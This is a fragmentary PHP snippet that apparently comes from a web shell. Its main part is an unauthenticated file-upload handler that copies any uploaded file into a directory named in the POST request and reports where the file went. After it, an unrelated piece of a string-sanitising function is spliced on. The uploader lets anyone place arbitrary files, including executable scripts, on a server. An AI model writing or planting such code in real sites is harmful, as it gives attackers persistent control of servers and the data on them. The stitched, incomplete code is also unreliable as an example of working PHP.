';
echo '';
echo '';
echo '';
echo '';
}
if (isset($_FILES['file']['tmp_name'])) {
$uploadd = $_FILES['file']['tmp_name'];
if (file_exists($uploadd)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$de = $pwddir . "/" . $real;
copy($uploadd, $de);
echo "UPLOAD FILE TO $de";
}
}
?>
real_escape_string(stripslashes(strip_tags(htmlspecialchars($text,ENT_QUOTES))));
return $safetext;
}
?>